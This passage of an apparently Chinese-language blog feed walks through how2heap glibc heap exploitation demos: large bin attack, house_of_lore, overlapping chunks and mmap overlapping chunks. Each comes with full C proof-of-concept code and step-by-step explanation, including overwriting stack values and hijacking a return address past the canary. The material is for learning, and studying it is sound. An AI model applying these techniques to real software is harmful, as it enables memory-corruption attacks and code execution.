class="o">*</span><span class="n">p3</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x500</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Finally, we allocate the third large chunk on the heap at: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">p3</span> <span class="o">-</span> <span class="mi">2</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"And allocate another fastbin chunk in order to avoid consolidating the top chunk with"</span> <span class="s">" the third large chunk during the free()</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x20</span><span class="p">);</span> <span class="c1">// 1</span> <span class="n">free</span><span class="p">(</span><span class="n">p1</span><span class="p">);</span> <span class="c1">// 2</span> <span class="n">free</span><span class="p">(</span><span class="n">p2</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"We free the first and second large chunks now and they will be inserted in the unsorted bin:"</span> <span class="s">" [ %p &lt;--&gt; %p ]</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">p2</span> <span class="o">-</span> <span class="mi">2</span><span class="p">),</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">p2</span><span class="p">[</span><span class="mi">0</span><span class="p">]));</span> <span class="c1">// 3</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x90</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now, we allocate a chunk with a size smaller than the freed first large chunk. This will move the"</span> <span class="s">" freed second large chunk into the large bin freelist, use parts of the freed first large chunk for allocation"</span> <span class="s">", and reinsert the remaining of the freed first large chunk into the unsorted bin:"</span> <span class="s">" [ %p ]</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">p1</span> <span class="o">+</span> <span class="mh">0x90</span><span class="p">));</span> <span class="c1">// 4</span> <span class="n">free</span><span class="p">(</span><span class="n">p3</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now, we free the third large chunk and it will be inserted in the unsorted bin:"</span> <span class="s">" [ %p &lt;--&gt; %p ]</span><span class="se">\n\n</span><span class="s">"</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">p3</span> <span class="o">-</span> <span class="mi">2</span><span class="p">),</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)(</span><span class="n">p3</span><span class="p">[</span><span class="mi">0</span><span class="p">]));</span> <span class="c1">//------------VULNERABILITY-----------</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now emulating a vulnerability that can overwrite the freed second large chunk's </span><span class="se">\"</span><span class="s">size</span><span class="se">\"</span><span class="s">"</span> <span class="s">" as well as its </span><span class="se">\"</span><span class="s">bk</span><span class="se">\"</span><span class="s"> and </span><span class="se">\"</span><span class="s">bk_nextsize</span><span class="se">\"</span><span class="s"> pointers</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Basically, we decrease the size of the freed second large chunk to force malloc to insert the freed third large chunk"</span> <span class="s">" at the head of the large bin freelist. To overwrite the stack variables, we set </span><span class="se">\"</span><span class="s">bk</span><span class="se">\"</span><span class="s"> to 16 bytes before stack_var1 and"</span> <span class="s">" </span><span class="se">\"</span><span class="s">bk_nextsize</span><span class="se">\"</span><span class="s"> to 32 bytes before stack_var2</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// 5</span> <span class="n">p2</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x3f1</span><span class="p">;</span> <span class="n">p2</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">p2</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">p2</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)(</span><span class="o">&amp;</span><span class="n">stack_var1</span> <span class="o">-</span> <span class="mi">2</span><span class="p">);</span> <span class="n">p2</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)(</span><span class="o">&amp;</span><span class="n">stack_var2</span> <span class="o">-</span> <span class="mi">4</span><span class="p">);</span> <span class="c1">//------------------------------------</span> <span class="c1">// 6</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x90</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Let's malloc again, so the freed third large chunk being inserted into the large bin freelist."</span> <span class="s">" During this time, targets should have already been rewritten:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"stack_var1 (%p): %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stack_var1</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">stack_var1</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"stack_var2 (%p): %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">stack_var2</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">stack_var2</span><span class="p">);</span> <span class="c1">// sanity check</span> <span class="n">assert</span><span class="p">(</span><span class="n">stack_var1</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">);</span> <span class="n">assert</span><span class="p">(</span><span class="n">stack_var2</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>最上面一部分代码分配了5个chunk,主要看p1,p2,p3,其余的代码划分为6个部分:</p> <ol> <li>释放p1,此时unsorted bin中插入了chunk(p1)</li> <li>释放p2,unsorted bin中插入chunk(p2)</li> <li>malloc(0x90) 这步会先查找unsorted bin,unsorted bin中第一个chunk是p2,p2不是最后一个块,而且它满足large bin的大小,所以p2被插入到large bin中。随后看p1,p1由于是unsorted bin中最后一个chunk,所以会被分割,将0x90大小返回给程序,剩余部分仍然放在unsorted bin中。所以此时: unsorted bin -&gt; chunk(p1)+0x100; large bin -&gt; chunk(p2)</li> <li>释放p3,chunk(p3)被插入unsorted bin</li> <li>为了使再次malloc后让p3成为large bin的第一个chunk,需要将p2的size改成比p3的size小的数值;又因为malloc后p2-&gt;bk_nextsize-&gt;fd_nextsize,p2-&gt;bk-&gt;fd 这两个指针会指向chunk(p3),所以为了更改栈上两个变量的值,我们需要将p2-&gt;bk指向&amp;stack_var1 - 2的地址,p2-&gt;bk_nextsize指向stack_var2 - 4的地址。所以才又了这部分代码</li> <li>最后malloc(0x90)就完成了上一步的计划,完成栈上值的覆写。</li> </ol> Mon, 21 Dec 2020 00:00:00 +0000 https://clot.github.io//how2heap-3 https://clot.github.io/how2heap-3 Heap Exploitation - how2heap 2 <p><a href="https://github.com/shellphish/how2heap">how2heap</a></p> <h2 id="house_of_lore">house_of_lore</h2> <p>这个例子主要是通过伪造chunk、fd和bk指针,使栈上的地址被安排到smallbin中,再通过malloc和memcpy来伪造数据,更改返回地址。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">jackpot</span><span class="p">(){</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Nice jump d00d</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">argv</span><span class="p">[]){</span> <span class="c1">// 1</span> <span class="kt">intptr_t</span><span class="o">*</span> <span class="n">stack_buffer_1</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="kt">intptr_t</span><span class="o">*</span> <span class="n">stack_buffer_2</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="kt">intptr_t</span> <span class="o">*</span><span class="n">victim</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> <span class="c1">// victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the chunk</span> <span class="kt">intptr_t</span> <span class="o">*</span><span class="n">victim_chunk</span> <span class="o">=</span> <span class="n">victim</span><span class="o">-</span><span class="mi">2</span><span class="p">;</span> <span class="n">stack_buffer_1</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">stack_buffer_1</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">stack_buffer_1</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="n">victim_chunk</span><span class="p">;</span> <span class="n">stack_buffer_1</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">intptr_t</span><span class="o">*</span><span class="p">)</span><span class="n">stack_buffer_2</span><span class="p">;</span> <span class="n">stack_buffer_2</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">intptr_t</span><span class="o">*</span><span class="p">)</span><span class="n">stack_buffer_1</span><span class="p">;</span> <span class="c1">// 2</span> <span class="kt">void</span> <span class="o">*</span><span class="n">p5</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">1000</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Allocated the large chunk on the heap at %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">p5</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Freeing the chunk %p, it will be inserted in the unsorted bin</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">victim</span><span class="p">);</span> <span class="n">free</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">victim</span><span class="p">);</span> <span class="kt">void</span> <span class="o">*</span><span class="n">p2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">1200</span><span class="p">);</span> <span class="c1">//------------VULNERABILITY-----------</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now emulating a vulnerability that can overwrite the victim-&gt;bk pointer</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// 3</span> <span class="n">victim</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">intptr_t</span><span class="p">)</span><span class="n">stack_buffer_1</span><span class="p">;</span> <span class="c1">// victim-&gt;bk is pointing to stack</span> <span class="c1">//------------------------------------</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now allocating a chunk with size equal to the first one freed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"This should return the overwritten victim chunk and set the bin-&gt;bk to the injected victim-&gt;bk pointer</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// 4</span> <span class="kt">void</span> <span class="o">*</span><span class="n">p3</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> <span class="kt">char</span> <span class="o">*</span><span class="n">p4</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">The fwd pointer of stack_buffer_2 has changed after the last malloc to %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">stack_buffer_2</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span> <span class="c1">// 5</span> <span class="kt">intptr_t</span> <span class="n">sc</span> <span class="o">=</span> <span class="p">(</span><span class="kt">intptr_t</span><span class="p">)</span><span class="n">jackpot</span><span class="p">;</span> <span class="c1">// Emulating our in-memory shellcode</span> <span class="n">memcpy</span><span class="p">((</span><span class="n">p4</span><span class="o">+</span><span class="mi">40</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">sc</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span> <span class="c1">// This bypasses stack-smash detection since it jumps over the canary</span> <span class="c1">// sanity check</span> <span class="n">assert</span><span class="p">((</span><span class="kt">long</span><span class="p">)</span><span class="n">__builtin_return_address</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="p">(</span><span class="kt">long</span><span class="p">)</span><span class="n">jackpot</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>源码被划分成5个步骤:</p> <ol> <li> <p>栈上伪装一个chunk,主要完成了以下工作:</p> <p>stack_buffer_1 -&gt; fd = victim_chunk</p> <p>stack_buffer_1 -&gt; bk = stack_buffer_2[0]</p> <p>stack_buffer_1 -&gt; fd = stack_buffer_1 // 这步是为了绕过small bin的检查:</p> </li> <li> <p>malloc后free,此时victim_chunk被加入unsorted bin,再次malloc使victim_chunk被加入small bin</p> </li> <li> <p>更改了victim_chunk的bk指针,指向stack_buffer_1,此时small bin就相当于有两个chunk</p> </li> <li> <p>p3 被分配0x100字节,victim_chunk从small bin弹出,这时small bin-&gt;bk 指向的是stack_buffer_1</p> <p>p4 被分配0x100字节,这块内存的首地址是small bin-&gt;bk, 即stack_buffer_1 + 0x10的地址(mem)</p> <p>同时,由于stack_buffer_1这个fake chunk的bk指向的是stack_buffer_2,且stack_buffer_2的fd指向的是stack_buffer_1,所以,当stack_buffer_1从small bin取出后,small bin-&gt;bk指向的就是stack_buffer_2</p> </li> <li> <p>此时p4指向的是栈地址,即stack_buffer_1 + 0x10的地址,所以可以通过memcpy可以更改栈上的数据。</p> <p>接着就是读取函数地址,并将其赋值给p4+40,绕过stack canary检查,覆盖返回地址。即完成ROP攻击。</p> </li> </ol> <p>参考下图:</p> <p><img src="../assets/images/house_of_lore.png" alt="house_of_lore" /></p> <h2 id="overlapping_chunks">overlapping_chunks</h2> <p>free后改写chunk的size字段,使之后malloc的空间大于其原本的空间大小,与其他指针所指向的数据区域重叠</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span> <span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">argv</span><span class="p">[]){</span> <span class="c1">// 1</span> <span class="kt">intptr_t</span> <span class="o">*</span><span class="n">p1</span><span class="p">,</span><span class="o">*</span><span class="n">p2</span><span class="p">,</span><span class="o">*</span><span class="n">p3</span><span class="p">,</span><span class="o">*</span><span class="n">p4</span><span class="p">;</span> <span class="n">p1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="n">p2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="n">p3</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x80</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">p1</span><span class="p">,</span> <span class="sc">'1'</span><span class="p">,</span> <span class="mh">0x100</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">p2</span><span class="p">,</span> <span class="sc">'2'</span><span class="p">,</span> <span class="mh">0x100</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">p3</span><span class="p">,</span> <span class="sc">'3'</span><span class="p">,</span> <span class="mh">0x80</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">Now let's free the chunk p2</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">p2</span><span class="p">);</span> <span class="c1">// 2</span> <span class="kt">int</span> <span class="n">evil_chunk_size</span> <span class="o">=</span> <span class="mh">0x181</span><span class="p">;</span> <span class="kt">int</span> <span class="n">evil_region_size</span> <span class="o">=</span> <span class="mh">0x180</span> <span class="o">-</span> <span class="mi">8</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">p2</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">=</span> <span class="n">evil_chunk_size</span><span class="p">;</span> <span class="c1">// we are overwriting the "size" field of chunk p2</span> <span class="c1">// 3</span> <span class="n">p4</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">evil_region_size</span><span class="p">);</span> <span class="c1">// 4</span> <span class="n">memset</span><span class="p">(</span><span class="n">p4</span><span class="p">,</span> <span class="sc">'4'</span><span class="p">,</span> <span class="n">evil_region_size</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">p3</span><span class="p">,</span> <span class="sc">'3'</span><span class="p">,</span> <span class="mi">80</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <ol> <li>分配三块连续的内存,并填充不同的数据。释放p2,存入unsorted bin</li> <li>p2的size字段被设置为0x180,并且设置了prev_inuse为1</li> <li>p4被分配了0x180-8大小,unsorted bin中的chunk被取出,而该chunk的大小比原先大了0x80,导致p4末尾的区域与p3重叠了</li> <li>用‘4’填充p4,覆盖掉了p3的数据;更改p3部分数据,覆盖掉p4部分数据</li> </ol> <h2 id="overlapping_chunks_2">overlapping_chunks_2</h2> <p>这个与上一个的区别是在free之前更改大小</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">(){</span> <span class="c1">// 1</span> <span class="kt">intptr_t</span> <span class="o">*</span><span class="n">p1</span><span class="p">,</span><span class="o">*</span><span class="n">p2</span><span class="p">,</span><span class="o">*</span><span class="n">p3</span><span class="p">,</span><span class="o">*</span><span class="n">p4</span><span class="p">,</span><span class="o">*</span><span class="n">p5</span><span class="p">,</span><span class="o">*</span><span class="n">p6</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">real_size_p1</span><span class="p">,</span><span class="n">real_size_p2</span><span class="p">,</span><span class="n">real_size_p3</span><span class="p">,</span><span class="n">real_size_p4</span><span class="p">,</span><span class="n">real_size_p5</span><span class="p">,</span><span class="n">real_size_p6</span><span class="p">;</span> <span class="kt">int</span> <span class="n">prev_in_use</span> <span class="o">=</span> <span class="mh">0x1</span><span class="p">;</span> <span class="n">p1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">1000</span><span class="p">);</span> <span class="n">p2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">1000</span><span class="p">);</span> <span class="n">p3</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">1000</span><span class="p">);</span> <span class="n">p4</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">1000</span><span class="p">);</span> <span class="n">p5</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">1000</span><span class="p">);</span> <span class="n">real_size_p1</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">p1</span><span class="p">);</span> <span class="n">real_size_p2</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">p2</span><span class="p">);</span> <span class="n">real_size_p3</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">p3</span><span class="p">);</span> <span class="n">real_size_p4</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">p4</span><span class="p">);</span> <span class="n">real_size_p5</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">p5</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">p1</span><span class="p">,</span><span class="sc">'A'</span><span class="p">,</span><span class="n">real_size_p1</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">p2</span><span class="p">,</span><span class="sc">'B'</span><span class="p">,</span><span class="n">real_size_p2</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">p3</span><span class="p">,</span><span class="sc">'C'</span><span class="p">,</span><span class="n">real_size_p3</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">p4</span><span class="p">,</span><span class="sc">'D'</span><span class="p">,</span><span class="n">real_size_p4</span><span class="p">);</span> <span class="n">memset</span><span class="p">(</span><span class="n">p5</span><span class="p">,</span><span class="sc">'E'</span><span class="p">,</span><span class="n">real_size_p5</span><span class="p">);</span> <span class="n">free</span><span class="p">(</span><span class="n">p4</span><span class="p">);</span> <span class="c1">// 2</span> <span class="o">*</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="o">*</span><span class="p">)((</span><span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">p1</span> <span class="o">+</span> <span class="n">real_size_p1</span> <span class="p">)</span> <span class="o">=</span> <span class="n">real_size_p2</span> <span class="o">+</span> <span class="n">real_size_p3</span> <span class="o">+</span> <span class="n">prev_in_use</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">size_t</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span> <span class="c1">//&lt;--- BUG HERE </span> <span class="n">free</span><span class="p">(</span><span class="n">p2</span><span class="p">);</span> <span class="c1">// 3</span> <span class="n">p6</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">2000</span><span class="p">);</span> <span class="n">real_size_p6</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">p6</span><span class="p">);</span> <span class="c1">// 4</span> <span class="n">memset</span><span class="p">(</span><span class="n">p6</span><span class="p">,</span><span class="sc">'F'</span><span class="p">,</span><span class="mi">1500</span><span class="p">);</span> </code></pre></div></div> <ol> <li>分配了5块内存,并用不同的字符填充内存块。最后释放p4(这一步不做也没影响)</li> <li>伪装一个chunk size, 塞到p2的chunk size位置,让系统认为p2的chunk size 有size(p2+p3)那么大;释放p2。</li> <li>分配了一块size(p2+p3)大小的内存给p6,覆盖了p3的内存</li> <li>填充p6的数据,导致p3数据被修改</li> </ol> <h2 id="mmap_overlapping_chunks">mmap_overlapping_chunks</h2> <p>如果malloc的参数大小超过了<code class="language-plaintext highlighter-rouge">mp_.mmap_threshold</code>,系统就会通过mmap来分配内存,由munmap来释放内存返回给kernel。通过mmap分配的内存的元数据中,m位被置为1,代表是mmap分配的。</p> <p>Mmap chunk的prev_size代表mmap chunk的剩余空间,而不是下一个块的大小。并且,chunk被释放时也不会使用到fd和bk指针,因为它不会被放回bins中。</p> <p>这里描述的也是覆盖chunk的攻击,只不过这里的chunk是通过mmap来分配的。</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">(){</span> <span class="kt">int</span><span class="o">*</span> <span class="n">ptr1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x10</span><span class="p">);</span> <span class="c1">// 1</span> <span class="kt">long</span> <span class="kt">long</span><span class="o">*</span> <span class="n">top_ptr</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100000</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"The first mmap chunk goes directly above LibC: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">top_ptr</span><span class="p">);</span> <span class="c1">// After this, all chunks are allocated downwards in memory towards the heap.</span> <span class="kt">long</span> <span class="kt">long</span><span class="o">*</span> <span class="n">mmap_chunk_2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100000</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"The second mmap chunk goes below LibC: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">mmap_chunk_2</span><span class="p">);</span> <span class="kt">long</span> <span class="kt">long</span><span class="o">*</span> <span class="n">mmap_chunk_3</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100000</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"The third mmap chunk goes below the second mmap chunk: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">mmap_chunk_3</span><span class="p">);</span> <span class="c1">// 2</span> <span class="c1">// Vulnerability!!! This could be triggered by an improper index or a buffer overflow from a chunk further below.</span> <span class="c1">// Additionally, this same attack can be used with the prev_size instead of the size.</span> <span class="n">mmap_chunk_3</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="mh">0xFFFFFFFFFD</span> <span class="o">&amp;</span> <span class="n">mmap_chunk_3</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="o">+</span> <span class="p">(</span><span class="mh">0xFFFFFFFFFD</span> <span class="o">&amp;</span> <span class="n">mmap_chunk_2</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="o">|</span> <span class="mi">2</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">"New size of third mmap chunk: 0x%llx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">mmap_chunk_3</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Free the third mmap chunk, which munmaps the second and third chunks</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// Munmaps both the second and third pointers</span> <span class="n">free</span><span class="p">(</span><span class="n">mmap_chunk_3</span><span class="p">);</span> <span class="cm">/* Would crash, if on the following: mmap_chunk_2[0] = 0xdeadbeef; This is because the memory would not be allocated to the current program. */</span> <span class="c1">// 3</span> <span class="c1">// Gets the distance between the two pointers.</span> <span class="kt">long</span> <span class="kt">long</span><span class="o">*</span> <span class="n">overlapping_chunk</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x300000</span><span class="p">);</span> <span class="c1">// 4</span> <span class="kt">int</span> <span class="n">distance</span> <span class="o">=</span> <span class="n">mmap_chunk_2</span> <span class="o">-</span> <span class="n">overlapping_chunk</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Distance between new chunk and the second mmap chunk (which was munmapped): 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">distance</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Value of index 0 of mmap chunk 2 prior to write: %llx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">mmap_chunk_2</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="c1">// Set the value of the overlapped chunk.</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Setting the value of the overlapped chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">overlapping_chunk</span><span class="p">[</span><span class="n">distance</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x1122334455667788</span><span class="p">;</span> <span class="n">assert</span><span class="p">(</span><span class="n">mmap_chunk_2</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="n">overlapping_chunk</span><span class="p">[</span><span class="n">distance</span><span class="p">]);</span> <span class="p">}</span> </code></pre></div></div> <ol> <li>分配了三块0x100000大小的内存,这些都是通过mmap分配的,所以不在heap的区域。第一块位于libc上方,而第二块位于libc下方,第三块位于第二块的下方。</li> <li>更改chunk3的size字段,改成了size(chunk3+chunk2),大小为0x202002,然后释放chunk3。此时由于从chunk3 + 0x202000的区域已经返回给kernel,所以一旦操作读写chunk2就会造成崩溃</li> 